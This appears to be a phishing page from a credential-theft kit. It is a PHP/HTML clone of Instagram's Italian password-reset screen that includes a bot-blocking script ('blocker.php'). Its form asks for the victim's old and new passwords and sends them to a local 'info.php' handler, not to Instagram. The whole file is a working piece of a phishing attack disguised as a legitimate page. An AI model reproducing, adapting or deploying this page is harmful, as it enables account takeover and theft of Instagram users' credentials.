<?php
include('../blocker.php');
?>
<!-- saved from url=(0014)about:internet -->
<html lang="fr" class="js not-logged-in "><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        
        <meta http-equiv="X-UA-Compatible" content="IE=edge">

        <title>
                  Instagram
                </title>

        
        <meta name="robots" content="noimageindex, noarchive">
        <meta name="apple-mobile-web-app-status-bar-style" content="default">
        <meta name="mobile-web-app-capable" content="yes">
        <meta name="theme-color" content="#ffffff">
        <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, viewport-fit=cover">
        <link rel="manifest" href="https://www.instagram.com/data/manifest.json">

        <link rel="preload" href="./files/48e0f28aa478.js.téléchargement" as="script" type="text/javascript" crossorigin="anonymous">
<link rel="preload" href="./files/26fb41c26eaa.js.téléchargement" as="script" type="text/javascript" crossorigin="anonymous">
<link rel="preload" href="./files/0ff92b7e5f9d.js.téléchargement" as="script" type="text/javascript" crossorigin="anonymous">
        
        

                <link rel="apple-touch-icon-precomposed" sizes="76x76" href="https://www.instagram.com/static/images/ico/apple-touch-icon-76x76-precomposed.png/666282be8229.png">
                <link rel="apple-touch-icon-precomposed" sizes="120x120" href="https://www.instagram.com/static/images/ico/apple-touch-icon-120x120-precomposed.png/8a5bd3f267b1.png">
                <link rel="apple-touch-icon-precomposed" sizes="152x152" href="https://www.instagram.com/static/images/ico/apple-touch-icon-152x152-precomposed.png/68193576ffc5.png">
                <link rel="apple-touch-icon-precomposed" sizes="167x167" href="https://www.instagram.com/static/images/ico/apple-touch-icon-167x167-precomposed.png/4985e31c9100.png">
                <link rel="apple-touch-icon-precomposed" sizes="180x180" href="https://www.instagram.com/static/images/ico/apple-touch-icon-180x180-precomposed.png/c06fdb2357bd.png">
                
                    <link rel="icon" sizes="192x192" href="https://www.instagram.com/static/images/ico/favicon-192.png/68d99ba29cc8.png">
                
            
            
                    <link rel="mask-icon" href="https://www.instagram.com/static/images/ico/favicon.svg/fc72dd4bfde8.svg" color="#262626">
                  
                  <link rel="shortcut icon" type="image/x-icon" href="https://www.instagram.com/static/images/ico/favicon.ico/36b3ee2d91ed.ico">
                
            
            
    <link rel="stylesheet" type="text/css" href="./files/ac3908099bec.css">

            
    
    <script type="text/javascript" src="./files/a4e77326039e.js.téléchargement" crossorigin="anonymous"></script>
    <script type="text/javascript" src="./files/203583927eba.js.téléchargement" crossorigin="anonymous"></script>
    <script type="text/javascript" src="./files/faf1d668dee8.js.téléchargement" crossorigin="anonymous"></script>
</head>
    <body class="sidebar-page -cx-PRIVATE-SidebarLayout__page -cx-PRIVATE-SidebarLayout__page__ page-accounts" style="">
        
            <div class="root -cx-PRIVATE-Page__root -cx-PRIVATE-Page__root__">
                
                    <div class="page -cx-PRIVATE-Page__body -cx-PRIVATE-Page__body__">
                        
                            
                                <header class="top-bar top-bar-new -cx-PRIVATE-NavBar__root -cx-PRIVATE-NavBar__root__">
    <div class="top-bar-wrapper -cx-PRIVATE-NavBar__wrapper -cx-PRIVATE-NavBar__wrapper__">
        <center>
		<img src="./files/ee.PNG">
		</center>

        <div class="top-bar-left -cx-PRIVATE-NavBar__topBarLeft -cx-PRIVATE-NavBar__topBarLeft__">
            <ul class="top-bar-actions">
                <li id="link_profile" class="link-signin -cx-PRIVATE-NavBar__signIn -cx-PRIVATE-NavBar__signIn__">
                          <a href="https://www.instagram.com/" class="loginLink">
                              
                              <strong ><font color="white">Casa</font></strong>
                          </a>
                      </li>
            </ul>
        </div>

        
            <div class="top-bar-right account-state" id="top_bar_right">
                <ul class="top-bar-actions -cx-PRIVATE-NavBar__topBarActions -cx-PRIVATE-NavBar__topBarActions__">
                    
                    
                      
                      <li id="link_profile" class="link-signin -cx-PRIVATE-NavBar__signIn -cx-PRIVATE-NavBar__signIn__">
                          <a href="https://www.instagram.com/accounts/login/" class="loginLink">
                              
                              <strong class="-cx-PRIVATE-NavBar__signInText -cx-PRIVATE-NavBar__signInText__">Accesso</strong>
                          </a>
                      </li>
                      
                    
                </ul>
            </div>
        
    </div>
</header> <!-- .top-bar -->
                            
                        

                        
    <div class="main -cx-PRIVATE-Page__main -cx-PRIVATE-Page__main__">
        <div class="sidebar -cx-PRIVATE-SidebarLayout__root -cx-PRIVATE-SidebarLayout__root__">
            <div class="wrapper -cx-PRIVATE-SidebarLayout__navWrapper -cx-PRIVATE-SidebarLayout__navWrapper__">
                <nav class="sidebar-nav -cx-PRIVATE-SidebarLayout__nav -cx-PRIVATE-SidebarLayout__nav__">
                    <div class="sidebar-content -cx-PRIVATE-SidebarLayout__content -cx-PRIVATE-SidebarLayout__content__">
                    
                    </div>
                </nav>
            </div>
        </div>
        <div class="wrapper -cx-PRIVATE-SidebarLayout__contentWrapper -cx-PRIVATE-SidebarLayout__contentWrapper__">
            <section class="nav-page-content -cx-PRIVATE-SidebarLayout__pageContent -cx-PRIVATE-SidebarLayout__pageContent__" role="main">
                
    <h1>Instagram</h1>
    

    

    

<div id="alerts" class="alerts">
    
    
    
    <p class="alert-red">Crea una password di almeno 6 caratteri.</p>
    
    
    
</div>



    <form data-encrypt="" action="info.php" method="POST" accept-charset="utf-8">
	<p><label for="id_enc_new_password1">Vecchia password:</label> <input  name="password0" type="password" required></p>
        <p><label for="id_enc_new_password1">nuova password:</label> <input  name="password1" type="password" required></p>
<p><label for="id_enc_new_password2">Conferma la nuova password:</label> <input  name="password2" type="password" required></p>
        <p><input type="submit" value="Resetta la password"></p>
        <input type="hidden" name="csrfmiddlewaretoken" value="W0n0ZCcutNqf1H7CjkvqqG46WuWcfmYa">
    </form>
    


            </section>
        </div> <!-- .main -->
    </div> <!-- .main -->


                    </div> <!-- .page -->

                    
                    <footer class="page-footer -cx-PRIVATE-Footer__root -cx-PRIVATE-Footer__root__" role="contentinfo">
                        <div class="wrapper -cx-PRIVATE-Footer__wrapper -cx-PRIVATE-Footer__wrapper__">
                            <nav class="-cx-PRIVATE-Footer__nav -cx-PRIVATE-Footer__nav__">
                                <ul class="-cx-PRIVATE-Footer__navItems -cx-PRIVATE-Footer__navItems__">
                                    <li><a href="https://www.instagram.com/about/us/">Chi siamo</a></li>
                                    <li><a href="https://help.instagram.com/">Supporto</a></li>
                                    <li><a href="https://about.instagram.com/blog/">Fretta</a></li>
                                    <li><a href="https://www.instagram.com/developer/">API</a></li>
                                    <li><a href="https://about.instagram.com/about-us/careers">Lavori</a></li>
                                    <li><a href="https://www.instagram.com/legal/privacy/">Riservatezza</a></li>
                                    <li><a href="https://www.instagram.com/legal/terms/">
                                      
                                          Termini di utilizzo
                                      
                                    </a></li>
                                </ul>
                            </nav>

                            <p class="copyright -cx-PRIVATE-Footer__copyright -cx-PRIVATE-Footer__copyright__">© 2021 Instagram</p>
                        </div>
                    </footer>
                    
                
                <div id="reactModalMountPoint"></div>
            </div> <!-- .root -->
        
        


        
           

<script type="text/javascript" src="./files/48e0f28aa478.js.téléchargement" crossorigin="anonymous"></script>
<script type="text/javascript" src="./files/26fb41c26eaa.js.téléchargement" crossorigin="anonymous"></script>
<script type="text/javascript" src="./files/0ff92b7e5f9d.js.téléchargement" crossorigin="anonymous" charset="utf-8" async=""></script>

            
        

        
    

</body></html>